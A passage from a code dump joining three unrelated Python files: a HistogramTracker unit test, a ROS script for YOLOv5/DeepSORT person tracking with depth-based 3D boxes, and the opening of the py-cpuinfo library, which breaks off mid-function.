class TestHistogramTracker(ScalyrTestCase):
"""Tests the HistogramTracker abstraction.
"""
def setUp(self):
super(TestHistogramTracker, self).setUp()
self._testing = HistogramTracker([10, 25, 50, 100])
def test_count(self):
self.assertEqual(self._testing.count(), 0)
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertEqual(self._testing.count(), 2)
self._testing.reset()
self.assertEqual(self._testing.count(), 0)
def test_average(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.average(), 6.0)
self._testing.reset()
self.assertIsNone(self._testing.average())
self._testing.add_sample(6)
self.assertAlmostEqual(self._testing.average(), 6.0)
def test_min(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 1.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.min(), 0.5)
self._testing.reset()
self.assertIsNone(self._testing.min())
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.min(), 15.0)
def test_max(self):
self._testing.add_sample(1)
self._testing.add_sample(11)
self.assertAlmostEqual(self._testing.max(), 11.0)
self._testing.add_sample(15)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.add_sample(0.5)
self.assertAlmostEqual(self._testing.max(), 15.0)
self._testing.reset()
self.assertIsNone(self._testing.max())
self._testing.add_sample(0)
self.assertAlmostEqual(self._testing.max(), 0)
def test_buckets(self):
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 0)
self._testing.add_sample(2)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 1)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self._testing.add_sample(50)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (1, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(5)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 2)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self._testing.add_sample(200)
buckets = self._buckets_to_list()
self.assertEqual(len(buckets), 3)
self.assertBucketEquals(buckets[0], (2, 2, 10))
self.assertBucketEquals(buckets[1], (1, 50, 100))
self.assertBucketEquals(buckets[2], (1, 100, 200.01))
def test_estimate_percentile(self):
self.assertIsNone(self._testing.estimate_median())
self._testing.add_sample(0)
self._testing.add_sample(3)
self._testing.add_sample(4)
# Since all of the values fall into the first bucket, the estimate of the percentile will be the same for all
# percentiles.
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 5.0)
self._testing.add_sample(11)
self._testing.add_sample(12)
self._testing.add_sample(13)
self._testing.add_sample(55)
self.assertAlmostEqual(self._testing.estimate_percentile(0.1), 5.0)
self.assertAlmostEqual(self._testing.estimate_percentile(0.5), 17.5)
self.assertAlmostEqual(self._testing.estimate_percentile(1.0), 75.0)
def test_summarize(self):
self.assertEqual(self._testing.summarize(), "(count=0)")
self._testing.add_sample(2)
self._testing.add_sample(4)
self._testing.add_sample(45)
self._testing.add_sample(200)
self.assertEqual(self._testing.summarize(),
"(count=4,avg=62.75,min=2.00,max=200.00,median=6.00)")
def assertBucketEquals(self, first, second):
self.assertEquals(first[0], second[0], msg="The counts do not equal")
self.assertAlmostEquals(first[1], second[1], msg="The lower bounds do not equal")
self.assertAlmostEquals(first[2], second[2], msg="The upper bounds do not equal")
def _buckets_to_list(self):
result = []
for count, lower, upper in self._testing.buckets():
result.append((count, lower, upper))
return result
|
watchout_3.0.py
|
from subprocess import STDOUT
import sys
from tf.transformations import rotation_matrix
sys.path.insert(0, './yolov5')
from yolov5.utils.datasets import LoadImages, LoadStreams,LoadWebcam,LoadRealsense
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords
from yolov5.utils.torch_utils import select_device, time_synchronized
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import argparse
import os
import platform
import shutil
import time
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
'''
直接再track.py改watchout,在v2.0的基础上加上了
- goodenbox 黄金分割法裁剪框(其实kcf利用了六个点的深度来判断效果更加)
并且和抗的算法匹配
version:3.0
'''
import numpy as np
from visualization_msgs.msg import Marker,MarkerArray
import rospy
from numba import jit
from tf import TransformListener
from APF_BASE_utils import BASE_TOOLS_for_car as To_1
from APF_FOLLOW_utils import FOLLOW_TOOLS_for_car as To_2
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def bbox_rel(*xyxy):
"""" Calculates the relative bounding box from absolute pixel values. """
bbox_left = min([xyxy[0].item(), xyxy[2].item()])
bbox_top = min([xyxy[1].item(), xyxy[3].item()])
bbox_w = abs(xyxy[0].item() - xyxy[2].item())
bbox_h = abs(xyxy[1].item() - xyxy[3].item())
x_c = (bbox_left + bbox_w / 2)
y_c = (bbox_top + bbox_h / 2)
w = bbox_w
h = bbox_h
return x_c, y_c, w, h
def compute_color_for_labels(label):
"""
Simple function that adds fixed color depending on the class
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def showdepth(boxes,depth):
for box in boxes:
x1,y1,x2,y2 = [int(i) for i in box]
for u in range(x1,x2):
for v in range(y1,y2):
print(depth[v,u]*0.001)
#注意 offset 光心偏移
def draw_boxes(img, bbox, identities=None, offset=(0, 0)):
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
import math
x1 = x1 + math.ceil((x2-x1)*0.382)
x2 = x1 + math.ceil((x2-x1)*0.618)
y1 = y1 + math.ceil((y2-y1)*0.382)
y2 = y1 + math.ceil((y2-y1)*0.618)
# print(img.shape)
# print(x1,y1,x2,y2)
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
# cv2.rectangle(
# img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
# cv2.putText(img, label, (x1, y1 +
# t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
return img
class Watchout:
def __init__(self):
self.lasttime = rospy.Time.now()
self.thistime = rospy.Time.now()
self.scale = 0.001
self.idcenvel = [] #id cx,cy,vx,vy
self.depth_thres = 10.0 #深度阀值
# 内参
fx = 609.2713012695312
cx = 316.67022705078125
fy = 608.010498046875
cy = 244.8178253173828
self.K = np.array([[1.0/fx,0,-cx/fx],
[0,1.0/fy,-cy/fy],
[0.0 , 0.0, 1.0]])
self.lines = [[0,1],[1,3],[3,2],[2,0],
[0,4],[2,6],[1,5],[3,7],
[4,5],[5,7],[7,6],[6,4]]
self.pub = rospy.Publisher('Personbox',MarkerArray,queue_size=1)
self.rate = rospy.Rate(10)
self.listener = TransformListener()
def watch(self,opt, save_img=False):
out, source,weights, view_img, save_txt, imgsz = \
opt.output, opt.source ,opt.weights, opt.view_img, opt.save_txt, opt.img_size
# initialize deepsort
cfg = get_config()
cfg.merge_from_file(opt.config_deepsort)
deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
use_cuda=True)
# Initialize
device = select_device(opt.device)
half = device.type != 'cpu' # half precision only supported on CUDA
# Load model
model = torch.load(weights, map_location=device)['model'].float() # load to FP32
model.to(device).eval()
if half:
model.half() # to FP16
# Set Dataloader
vid_path, vid_writer = None, None
if source=='0':
dataset = LoadWebcam(source,imgsz)
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
else:
dataset = LoadRealsense('0',img_size=imgsz)
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
# Get names and colors
names = model.module.names if hasattr(model, 'module') else model.names
# Run inference
t0 = time.time()
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
# run once
_ = model(img.half() if half else img) if device.type != 'cpu' else None
vis, pos_end = To_1.init(mapsize=150, scale=15)
# vis, pos_end, id_ = To_2.init(mapsize=150, scale=15)
for frame_idx, (path, img, im0, depth) in enumerate(dataset):
self.thistime = rospy.Time.now()
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = time_synchronized()
pred = model(img, augment=opt.augment)[0]
# Apply NMS
# [xyxy, conf, cls] n*6
pred = non_max_suppression(
pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)
t2 = time_synchronized()
# Print time (inference + NMS)
print('Done. (%.3fs)' % ( t2 - t1))
# Process detections
for i, det in enumerate(pred): # detections per image
im0 = im0.copy()
if det is not None and len(det):
# Rescale boxes from img_size to im0 size 即处理 xyxy
det[:, :4] = scale_coords(
img.shape[2:], det[:, :4], im0.shape).round()
bbox_xywh = []
confs = []
# Adapt detections to deep sort input format
# deepsort的输入类型为 centerx,centery,w,h,confidence,
for *xyxy, conf, cls in det:
x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
obj = [x_c, y_c, bbox_w, bbox_h]
bbox_xywh.append(obj)
confs.append([conf.item()])
xywhs = torch.Tensor(bbox_xywh)
confss = torch.Tensor(confs)
# Pass detections to deepsort
# outputs : x1 y1 x2 y2 id
outputs = deepsort.update(xywhs, confss, im0)
# draw boxes for visualization
if len(outputs) > 0:
bbox_xyxy = outputs[:, :4]
identities = outputs[:, -1]
draw_boxes(im0, bbox_xyxy, identities)
t3 = rospy.Time.now()
# self.publish3dbox(depth,bbox_xyxy,identities)
# if not self.init:
# import threading
# thread = threading.Thread(target=self.publish3dbox,args=(depth,bbox_xyxy,identities))
# thread.start()
# self.init = 1
# print('开启成功')
blocklist = self.twodbox(depth,bbox_xyxy,identities)
pos_now = (0, 0, 0, 0, 0)
vx, vy, w, f = To_1.Vis_and_deside(vis=vis, pos_now=pos_now,
pos_end=pos_end, blocklist=blocklist)
# vx, vy, w, f, id_ = To_2.Vis_and_deside(vis=vis, pos_now=pos_now,
# pos_end=pos_end, blocklist=blocklist,id_=id_)
print(f'Creating markderarrary use {(rospy.Time.now()-t3).to_sec()} s ')
print(self.idcenvel)
else:
deepsort.increment_ages()
# Stream results
if view_img:
cv2.imshow('watchout', im0)
if cv2.waitKey(1) == ord('q') or rospy.is_shutdown(): # q to quit
# thread.join()
print('Done. (%.3fs)' % (time.time() - t0))
raise StopIteration
self.lasttime = self.thistime
def goodenbox(self,bbox_xyxy):
pass
# @jit
def create_box(self,depth_img,box,offset=(0,0)):
# 计算公式 x = (u*depth - cx*depth)/fx y = (v*depth - cy*depth)/fy
# 先将 像素坐标 uv1 * depth
x1,y1,x2,y2 = [int(i) for i in box]
w = x2 - x1
h = y2 - y1
#黄金比例切割背景
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uv1 = []
for u in range(u1,u2):
for v in range(v1,v2):
depth = float(depth_img[v,u])*self.scale
if depth > self.depth_thres:
continue
else:
uv1.append([u*depth,v*depth,depth])
if(len(uv1)<1):
print("create_error")
return 0,0,None
# 3*n
uvd = np.array(uv1).T
# 将 uvd * 相机内参矩阵 K 转化为相机坐标的 xyz 但 相机坐标的 xyz 对应着三维空间中的 yzx
# n*3
yzx = self.K.dot(uvd).T
# 用均值代替质心
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
# 找到八个顶点
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
from sensor_msgs.msg import PointCloud
pcl = PointCloud()
pcl.header.frame_id = '/camera'
pcl.header.frame_id = self.thistime
pcl.points.append((cx,cy,0))
pcl.points.append((xmax,ymax,zmax))
pcl.points.append((xmin,ymin,zmin))
# tranform point in camera to gobal
import tf
try:
self.listener.lookupTransform('/map','/camera',rospy.Time(3))
except:
exit
self.listener.transformPointCloud('/map',pcl)
from geometry_msgs.msg import Point
points = [Point(xmin,ymin,zmin),Point(xmax,ymin,zmin),
Point(xmin,ymax,zmin),Point(xmax,ymax,zmin),
Point(xmin,ymin,zmax),Point(xmax,ymin,zmax),
Point(xmin,ymax,zmax),Point(xmax,ymax,zmax)]
# 创建 bbox
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time.now()
marker.action = Marker.ADD
marker.type = Marker.LINE_LIST
# marker.lifetime = rospy.Duration(0)
marker.color.r = 1
marker.color.g = 0
marker.color.b = 0
marker.color.a = 1
marker.scale.x = 0.2
marker.points = []
for line in self.lines:
marker.points.append(points[line[0]])
marker.points.append(points[line[1]])
return cx , cy , marker
# @jit
def publish3dbox(self,depth_img,bbox,identities=None,offset=(0,0)):
markerarray = MarkerArray()
dt = (self.thistime - self.lasttime).to_sec()
idcentvel_tmp = []
# 生成markerarray 并 进行匹配计算 idcentvel
for i,id_ in enumerate(identities):
marker = Marker()
cx,cy,marker = self.create_box(depth_img,bbox[i],offset)
marker.id = id_
markerarray.markers.append(marker)
flag = 0
# 妙处:初始化时是空列表,同时完成了第一次时间的初始化
for idcv in self.idcenvel:
if id_ == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
idcentvel_tmp.append([id_,cx,cy,vx,vy])
flag = 1
break
if not flag:
vx=vy=0.0
idcentvel_tmp.append([id_,cx,cy,vx,vy])
self.idcenvel = idcentvel_tmp
print('idcenvel',self.idcenvel)
self.pub.publish(markerarray)
def drawsquare(self,xyxy,depth):
# 计算公式 x = (u*depth - cx*depth)/fx y = (v*depth - cy*depth)/fy
# 先将 像素坐标 uv1 * depth
x1,y1,x2,y2 = [int(i) for i in xyxy]
w = x2 - x1
h = y2 - y1
#黄金比例切割背景
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uvd = []
for u in range(u1,u2):
for v in range(v1,v2):
depth_ = float(depth[v,u])*self.scale
if depth_ > 10: continue
else: uvd.append([u*depth_,v*depth_,depth_])
yzx = self.K.dot(np.array(uvd).T).T
# 用均值代替质心
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
# 找到八个顶点
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
# from sensor_msgs.msg import PointCloud
# pcl = PointCloud()
# pcl.header.frame_id = '/camera_frame'
# pcl.header.frame_id = self.thistime
# pcl.points.append((cx,cy,0))
# pcl.points.append((xmax,ymax,zmax))
# pcl.points.append((xmin,ymin,zmin))
# print(pcl)
# tranform point in camera to gobal
import tf
# try:
(trans,rot) = self.listener.lookupTransform(target_frame='/map',source_frame='/camera_frame',time=rospy.Time(0))
print('transform yes')
# print(type(trans))
# print(rot)
from scipy.spatial.transform import Rotation as R
r = R.from_quat(rot)
rostate_matrix = r.as_matrix()
vector = np.array((cx,cy,0))
print('firstvector=',vector)
vector = vector+trans
vector = rostate_matrix.dot(vector)
# cx = pcl.points[0].x
# cy = pcl.points[0].y
# r1 = abs(pcl.points[2].x-pcl.points[1].x)
# r2 = abs(pcl.points[2].y-pcl.points[1].y)
# r = min([r1,r2])
print('trans=',trans)
print('rot=',rostate_matrix)
print('second=',vector)
return vector[0] , vector[1] , (xmax-xmin)/2
def twodbox(self,depth,bbox,identities=None,offset=(0,0)):
dt = (self.thistime - self.lasttime).to_sec()
print('dt=',dt)
idcentvel_tmp = []
for i,id in enumerate(identities):
cx,cy,r = self.drawsquare(bbox[i],depth)
# 妙处:初始化时是空列表,同时完成了第一次时间的初始化
flag = 0
for idcv in self.idcenvel:
if id == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
if abs(vx) < 0.01: vx=0.0
if abs(vy) < 0.01: vy=0.0
idcentvel_tmp.append((id,cx,cy,vx,vy,0.5))
flag = 1
break
if not flag:
vx = vy = 0.0
idcentvel_tmp.append((id,cx,cy,vx,vy,0.5))
## update idcenvel
self.idcenvel = idcentvel_tmp
print(idcentvel_tmp)
return self.idcenvel
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str,
default='yolov5/weights/yolov5s.pt', help='model.pt path')
# file/folder, 0 for webcam
parser.add_argument('--source', type=str,
default='inference/images', help='source')
parser.add_argument('--output', type=str, default='inference/output',
help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=640,
help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float,
default=0.4, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float,
default=0.5, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v',
help='output video codec (verify ffmpeg support)')
parser.add_argument('--device', default='',
help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true',
help='display results')
parser.add_argument('--save-txt', action='store_true',
help='save results to *.txt')
# class 0 is person
parser.add_argument('--classes', nargs='+', type=int,
default=[0], help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true',
help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true',
help='augmented inference')
parser.add_argument("--config_deepsort", type=str,
default="deep_sort_pytorch/configs/deep_sort.yaml")
args = parser.parse_args()
args.img_size = check_img_size(args.img_size)
print(args)
rospy.init_node('watchout')
watchout = Watchout()
with torch.no_grad():
watchout.watch(args)
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2021 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (8, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
import os, sys
import platform
import multiprocessing
import ctypes
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
g_trace = None
class Trace(object):
def __init__(self, is_active, is_stored_in_string):
self._is_active = is_active
if not self._is_active:
return
from datetime import datetime
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
if is_stored_in_string:
self._output = StringIO()
else:
date = datetime.now().strftime("%Y-%m-%d_%H-%M-%S-%f")
self._output = open('cpuinfo_trace_{0}.trace'.format(date), 'w')
self._stdout = StringIO()
self._stderr = StringIO()
self._err = None
def header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def success(self):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("Success ... ({0} {1})\n\n".format(file, line))
self._output.flush()
def fail(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
if isinstance(msg, str):
msg = ''.join(['\t' + line for line in msg.split('\n')]) + '\n'
self._output.write(msg)
self._output.write("Failed ... ({0} {1})\n\n".format(file, line))
self._output.flush()
elif isinstance(msg, Exception):
from traceback import format_exc
err_string = format_exc()
self._output.write("\tFailed ... ({0} {1})\n".format(file, line))
self._output.write(''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n')
self._output.flush()
def command_header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[3]
file = frame[1]
line = frame[2]
self._output.write("\t{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def command_output(self, msg, output):
if not self._is_active: return
self._output.write("\t\t{0}\n".format(msg))
self._output.write(''.join(['\t\t\t{0}\n'.format(n) for n in output.split('\n')]) + '\n')
self._output.flush()
def keys(self, keys, info, new_info):
if not self._is_active: return
from inspect import stack
frame = stack()[2]
file = frame[1]
line = frame[2]
# List updated keys
self._output.write("\tChanged keys ({0} {1})\n".format(file, line))
changed_keys = [key for key in keys if key in info and key in new_info and info[key] != new_info[key]]
if changed_keys:
for key in changed_keys:
self._output.write('\t\t{0}: {1} to {2}\n'.format(key, info[key], new_info[key]))
else:
self._output.write('\t\tNone\n')
# List new keys
self._output.write("\tNew keys ({0} {1})\n".format(file, line))
new_keys = [key for key in keys if key in new_info and key not in info]
if new_keys:
for key in new_keys:
self._output.write('\t\t{0}: {1}\n'.format(key, new_info[key]))
else:
self._output.write('\t\tNone\n')
self._output.write('\n')
self._output.flush()
def write(self, msg):
if not self._is_active: return
self._output.write(msg + '\n')
self._output.flush()
def to_dict(self, info, is_fail):
return {
'output' : self._output.getvalue(),
'stdout' : self._stdout.getvalue(),
'stderr' : self._stderr.getvalue(),
'info' : info,
'err' : self._err,
'is_fail' : is_fail
}
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
is_beos = 'beos' in uname or 'haiku' in uname
return is_beos and len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
processor_brand = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "ProcessorNameString")
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
vendor_id_raw = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "VendorIdentifier")
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
arch_string_raw = _read_windows_registry_key(r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE")
return arch_string_raw
@staticmethod
def winreg_hz_actual():
hz_actual = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "~Mhz")
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
feature_bits = _read_windows_registry_key(r"Hardware\Description\System\CentralProcessor\0", "FeatureSet")
return feature_bits
def _program_paths(program_name):
paths = []
exts = filter(None, os.environ.get('PATHEXT', '').split(os.pathsep))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
p1, p2, stdout_output, stderr_output = None, None, None, None
g_trace.command_header('Running command "' + ' '.join(command) + '" ...')
# Run the command normally
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
# Run the command and pipe it into another command
else:
p2 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p1 = Popen(pipe_command, stdin=p2.stdout, stdout=PIPE, stderr=PIPE)
p2.stdout.close()
# Get the stdout and stderr
stdout_output, stderr_output = p1.communicate()
if not IS_PY2:
stdout_output = stdout_output.decode(encoding='UTF-8')
stderr_output = stderr_output.decode(encoding='UTF-8')
# Send the result to the logger
g_trace.command_output('return code:', str(p1.returncode))
g_trace.command_output('stdout:', stdout_output)
# Return the return code and stdout
return p1.returncode, stdout_output
def _read_windows_registry_key(key_name, field_name):
g_trace.command_header('Reading Registry key "{0}" field "{1}" ...'.format(key_name, field_name))
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_name)
value = winreg.QueryValueEx(key, field_name)[0]
winreg.CloseKey(key)
g_trace.command_output('value:', str(value))
return value
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8',
'PPC_64', 'S390X', 'MIPS_32', 'MIPS_64',
'RISCV_32', 'RISCV_64', 'LOONG_32', 'LOONG_64']:
raise Exception("py-cpuinfo currently only works on X86 "
"and some ARM/PPC/S390X/MIPS/RISCV/LOONG CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
g_trace.keys(keys, info, new_info)
# Update the keys with new values
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
